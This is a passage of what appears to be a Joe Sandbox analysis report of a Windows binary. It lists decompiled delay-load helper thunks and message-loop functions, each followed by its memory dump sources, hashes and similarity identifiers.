                                                          • Part of subcall function 00A1AF04: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AF15
                                                          • Part of subcall function 00A1AF04: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AF26
                                                          • Part of subcall function 00A1AF04: IsDialogMessageW.USER32(0001039A,?), ref: 00A1AF3A
                                                          • Part of subcall function 00A1AF04: TranslateMessage.USER32(?), ref: 00A1AF48
                                                          • Part of subcall function 00A1AF04: DispatchMessageW.USER32(?), ref: 00A1AF52
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                        • String ID:
                                                        • API String ID: 897784432-0
                                                        • Opcode ID: 9a7c5aaa36e63a621cc2cd625b8d7cf3c5098779aff3432b3b6baa26b54aa2b2
                                                        • Instruction ID: 2efa1a9c802dc3b1c796dfa18ec25a9b7872fe43ba2ad6e398a229b503dd9785
                                                        • Opcode Fuzzy Hash: 9a7c5aaa36e63a621cc2cd625b8d7cf3c5098779aff3432b3b6baa26b54aa2b2
                                                        • Instruction Fuzzy Hash: FED09E75244201AAD6116B51DE06F1E7AA2BB98B05F404954B344740F18676AD21EF16
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBA5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBA5() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa6214c); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 30635d35ba7ddff5eadc727930d9d0a59e1485b37bd603a274915d10fb12176e
                                                        • Instruction ID: 093bbfe0d13efe68e03711bb9cc63d77dd0b96ab04e5eb86dca225e88866eae1
                                                        • Opcode Fuzzy Hash: 30635d35ba7ddff5eadc727930d9d0a59e1485b37bd603a274915d10fb12176e
                                                        • Instruction Fuzzy Hash: F7B012B926C4027C3104A1446D02DB6016CC4C1B107308D1AB906C10C0D4501C850131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBAF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBAF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62148); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 1d28f57cec66ab319d634a04627a415b35db260e501a1a2a30fed56d8072b1cd
                                                        • Instruction ID: c29be8709d2e7441577d7ae9f70c148abda08b39acae9bb03bdfa35c9f9355af
                                                        • Opcode Fuzzy Hash: 1d28f57cec66ab319d634a04627a415b35db260e501a1a2a30fed56d8072b1cd
                                                        • Instruction Fuzzy Hash: E4B012B926C5027D3144A1446D02DB6016CC4C0B507314E1AB506C10C0D4501CC10131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBB9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBB9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62144); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 4cd01615208d7e64c47fcbc8e539524be6f7bf349c30b005ba3faa74289d136f
                                                        • Instruction ID: 379ce7b4f98281cb2e827508875665f6917c0a5f7c63595502c0ce82fd4ddd0b
                                                        • Opcode Fuzzy Hash: 4cd01615208d7e64c47fcbc8e539524be6f7bf349c30b005ba3faa74289d136f
                                                        • Instruction Fuzzy Hash: D3B012B926C4027C3108A1446E02DB6016CC4C0B107304D1AB506C10C0D4501D820131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DB87 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DB87() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62158); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ae02ee2a17dd0fbbae8eaed4272cf3fa2e70fa4db14dc24f8a6bec96157f653e
                                                        • Instruction ID: 87898fdef363d13d9201e165bf5509b45fadd2a83cfa6b7b2b600cee2945cf00
                                                        • Opcode Fuzzy Hash: ae02ee2a17dd0fbbae8eaed4272cf3fa2e70fa4db14dc24f8a6bec96157f653e
                                                        • Instruction Fuzzy Hash: B4B012E927C5427D3144A1446D02DB6016CC4C0B507318E1AB602D11C0D4501CC60131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DB9B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DB9B() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62150); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ce046bbac645f5249e1c5bbf0f05ab35cf6c059dc0d8f596f4f5a93db554e036
                                                        • Instruction ID: a1627e77cd8a0bc56683b4fbbb32c1bcb610a3bacc68b05f528962d098a80a55
                                                        • Opcode Fuzzy Hash: ce046bbac645f5249e1c5bbf0f05ab35cf6c059dc0d8f596f4f5a93db554e036
                                                        • Instruction Fuzzy Hash: C3B012E926C4027C3104A1846D02DB6016CD4C4B107308D1AB602D11C0D4501C860131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBE1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBE1() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62134); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 220ae7bb5c9e23e9d6a5d0c3fb656fce3ebaf16b95bf4bad5ccaa1c9eafeb457
                                                        • Instruction ID: 4fb00d6635dc698b329b33590e33b04906fa58d4c487b01b0a1802f2b46affeb
                                                        • Opcode Fuzzy Hash: 220ae7bb5c9e23e9d6a5d0c3fb656fce3ebaf16b95bf4bad5ccaa1c9eafeb457
                                                        • Instruction Fuzzy Hash: C7B012A926E4027C3108A1446E02DB6016EC5C0B50B304D1AB502C10C0D4511C820131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBEB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBEB() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62130); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 4ca63dd9b493988b9c914317965d9737cb6861508a8e9062df8cf4afa99d5d45
                                                        • Instruction ID: a3abb7bdda6a44fa4a5789c5f7af93b017d520d86386c10b3b4fd8cbe55dbb0e
                                                        • Opcode Fuzzy Hash: 4ca63dd9b493988b9c914317965d9737cb6861508a8e9062df8cf4afa99d5d45
                                                        • Instruction Fuzzy Hash: 08B012A927D4027C3104A1446D02DB601AED9C0B10B304D1AB502C10C0D4501C810131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBFF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBFF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62128); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 3f0598e12c65ebc295cc8a509fa1e5546b2a7e2b1f2d642f6a3d7d595ff19fb0
                                                        • Instruction ID: e58d466998f5da48926de685d30a37545475042c82647fc1ff71d0e321858e05
                                                        • Opcode Fuzzy Hash: 3f0598e12c65ebc295cc8a509fa1e5546b2a7e2b1f2d642f6a3d7d595ff19fb0
                                                        • Instruction Fuzzy Hash: 42B012A926D5027D3144A1446D02DB601ACC4C0B507314E1AB502C10C0D5501CC10131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBC3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62140); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 197c7b1b9f9635740edac9dab9051c46d9fdf876b0756079211c47dad264cfa1
                                                        • Instruction ID: 8683c556ff58e0248cd873787e8fc24b17f27a7a0d250ef35723eb28c82440e1
                                                        • Opcode Fuzzy Hash: 197c7b1b9f9635740edac9dab9051c46d9fdf876b0756079211c47dad264cfa1
                                                        • Instruction Fuzzy Hash: 03B012B926C4027C3108A1456D02DB6016CD4C0B107304D1AB506C10C0D4501C810131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBCD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DBCD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa6213c); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b06e1860892cfe3019dc0286b5c7ec79cb4631a3c40a5c4934ea7a7c3e492f3b
                                                        • Instruction ID: 2197c04b892d8f77cbf53feb5e8d009242db97f1c5a0d8bb4591eabfbd840988
                                                        • Opcode Fuzzy Hash: b06e1860892cfe3019dc0286b5c7ec79cb4631a3c40a5c4934ea7a7c3e492f3b
                                                        • Instruction Fuzzy Hash: 45B012A926D4027C3104A1446D02DB6016EC5C1B10B308D1AB902C10C0D4501C810131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DB69 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DB69() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62164); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 60545e5031d8ca35a550e0889e97a0b91f60d5dc9cf6d9986360a6271c28a424
                                                        • Instruction ID: 8b936c4173319c5754f247e034125112581a3b139d41aee96aa15b7728b7d6b7
                                                        • Opcode Fuzzy Hash: 60545e5031d8ca35a550e0889e97a0b91f60d5dc9cf6d9986360a6271c28a424
                                                        • Instruction Fuzzy Hash: FAB012AD26C6027C3108A1447E52DBB016CC4C0B107304D1AB602C10C0D4501C820131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DB73 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DB73() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62160); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
